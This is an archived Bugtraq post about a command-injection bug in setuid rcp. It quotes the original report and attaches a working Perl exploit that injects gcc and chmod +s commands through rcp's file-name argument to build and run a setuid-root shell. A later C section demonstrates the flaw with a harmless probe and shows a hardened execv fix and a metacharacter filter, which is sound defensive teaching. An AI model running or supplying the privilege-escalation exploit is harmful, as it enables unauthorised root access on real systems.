[17742] in bugtraq


Re: possible bug in rcp...

daemon@ATHENA.MIT.EDU (tlabs)
Thu Nov 23 16:43:55 2000

Message-Id:  <20001122140823.T35867@deceptively.shady.org>
Date:         Wed, 22 Nov 2000 14:08:23 +0000
Reply-To: tlabs <tlabs@DECEPTIVELY.SHADY.ORG>
From: tlabs <tlabs@DECEPTIVELY.SHADY.ORG>
X-To:         bugtraq@security-focus.com
To: BUGTRAQ@SECURITYFOCUS.COM


On Wed, Nov 22, 2000 at 09:11:20AM +1100, Andrew Griffiths wrote:
> Here is a possible bug in rcp; since I think it calls system(). I
> haven't had much time to play with this, because exams are coming up.
>
> It is negated because system() calls /bin/cp which, with the newer
> versions of bash, drops its effective credentials...
>
> $ ls -alF  `which rcp`
> -rwsr-xr-x    1    root    root        14492    Jul 21 22:43
> /usr/sbin/rcp
>
> $ cd /tmp
> $ echo bla > bob
> $ rcp 'bob bobalina;  /usrt/bin/id;' 127.0.0.1
> uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
> sh: 127.0.0.1: command not found.
>
> Now doing a quick ltrace - it doesn't remove ; and ` and other fun
> stuff. This could probably be exploited on older bash versions?
>
> It's up to you guys/girls now, I should start to study...
>
> Andrew Griffiths

just a wee exploit to help the boys and girls along innit

tlabs



Attachment: rcpsploit.pl

#!/usr/bin/perl -w
# exploits suid privileges on rcp
# Not really tested this but hey
# works on redhat6.2
# does not work on freebsd4.1 stable
#
# bug discovered by
# Andrew Griffiths
#
# Exploit written by tlabs
# greetz to those that know me innit
#
# Please set your rcpfile
# this can be found by doing
#
# ls -alF `which rcp`
#
# have a lot of fun

use strict;

my $RCPFILE = "/usr/bin/rcp";

# configure above innit

sub USAGE
{
    print "$0\nWritten by Tlabs\n";
    exit 0;
}

if ( ! -u $RCPFILE )
{
    print "rcp is not suid, quitting\n";
    exit 0;
}

# Write the setuid-root shell wrapper. Truncate rather than append, so a
# stale /tmp/shell.c left over from an earlier run cannot break the compile.
open(TEMP, ">/tmp/shell.c") || die "Something went wrong: $!";
print TEMP "#include <unistd.h>\n#include <stdlib.h>\nint main()\n{\n";
print TEMP "\tsetuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\", \"sh\", (char *)0);\n\treturn 0;\n}\n";
close(TEMP);

# Dummy source file so the cp part of rcp's command line has something to copy.
open(HMM, ">hey") || die "Something went wrong: $!";
print HMM "Sploit written by tlabs, thanks to Andrew Griffiths for the bug report";
close(HMM);

# rcp hands the file names to system() without stripping shell
# metacharacters, so the ';' in the source name lets extra commands
# ride along on the same sh -c line. Use the configured binary, not
# whatever rcp happens to be first in $PATH.
system "$RCPFILE 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null";
system "$RCPFILE 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null";
unlink("/tmp/shell.c");
unlink("hey");
unlink("geezer");
print "Ok, too easy, we'll just launch a shell, lets hope shit went well innit:)\n";

exec '/tmp/shell';

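The bug under discussion, reduced to a runnable C example (added here as an illustration; this is not code from rcp, from Andrew Griffiths' report or from tlabs' script). copy_via_shell() reproduces the vulnerable pattern the transcript shows: the two file names are pasted into a command line that is handed to "sh -c", so a ';' in a name ends the cp command and starts another. copy_noshell() is the hardened form: the names travel as separate argv elements through execv(), with no shell in between, and the child drops any set-uid/set-gid privilege before exec. Assumptions: the "%s %s" command-line format is modelled on the transcript's "sh: 127.0.0.1: command not found", not copied from any rcp source; the copy program is replaced by a stand-in (a shell one-liner that exits with the number of arguments it received) so the effect is observable as an exit status; /bin/sh exists; the inputs "bob" and "bob bobalina; exit 42;" are constructed.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Stand-in for /bin/cp (assumption for this example): a shell one-liner
 * that exits with the number of arguments it was given. A benign copy
 * therefore exits 2 (source, destination); if a file name was split by
 * the shell and an injected "exit 42" ran, we see 42 instead.
 */
#define PROBE_PATH   "/bin/sh"
#define PROBE_SCRIPT "exit $#"

/* Reap a child and return its exit status, or -1 on error or signal death. */
static int wait_status(pid_t pid)
{
    int st;
    if (pid < 0 || waitpid(pid, &st, 0) < 0)
        return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/*
 * VULNERABLE: file names pasted into a command string that sh -c parses.
 * Anything the shell treats specially (';', '`', '$(...)', '|', ...) in
 * src or dst is interpreted, exactly as in the rcp transcript above.
 */
int copy_via_shell(const char *src, const char *dst)
{
    char cmd[4096];
    int n = snprintf(cmd, sizeof cmd, "%s -c '%s' probe %s %s",
                     PROBE_PATH, PROBE_SCRIPT, src, dst);
    if (n < 0 || (size_t)n >= sizeof cmd)
        return -1;
    pid_t pid = fork();
    if (pid == 0) {
        execl("/bin/sh", "sh", "-c", cmd, (char *)0);
        _exit(127);
    }
    return wait_status(pid);
}

/*
 * HARDENED: no shell. Each file name is one argv element, so the kernel
 * passes it through untouched whatever characters it contains. The child
 * also drops set-uid/set-gid privilege before exec, so even a stand-in
 * program that misbehaves runs as the invoking user.
 */
int copy_noshell(const char *src, const char *dst)
{
    char *const argv[] = { "sh", "-c", PROBE_SCRIPT, "probe",
                           (char *)src, (char *)dst, (char *)0 };
    pid_t pid = fork();
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(127);
        execv(PROBE_PATH, argv);
        _exit(127);
    }
    return wait_status(pid);
}

/* Defence in depth: reject names containing shell metacharacters outright. */
int has_shell_meta(const char *name)
{
    return strpbrk(name, ";&|$`'\"\\<>()*?[]{}~ \t\n") != NULL;
}

int main(void)
{
    const char *benign = "bob";                      /* constructed input */
    const char *evil   = "bob bobalina; exit 42;";   /* constructed input */
    printf("via shell : benign=%d evil=%d\n",
           copy_via_shell(benign, "127.0.0.1"), copy_via_shell(evil, "127.0.0.1"));
    printf("no shell  : benign=%d evil=%d\n",
           copy_noshell(benign, "127.0.0.1"), copy_noshell(evil, "127.0.0.1"));
    printf("has_shell_meta(evil)=%d\n", has_shell_meta(evil));
    return 0;
}
```

Run as-is, the shell path reports 2 for the benign name and 42 for the crafted one (the injected command ran), while the execv path reports 2 for both: the crafted name never stopped being a single argument. In a real set-uid program the privilege drop in the child is what keeps an injected command from mattering even if a shell does get involved somewhere.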
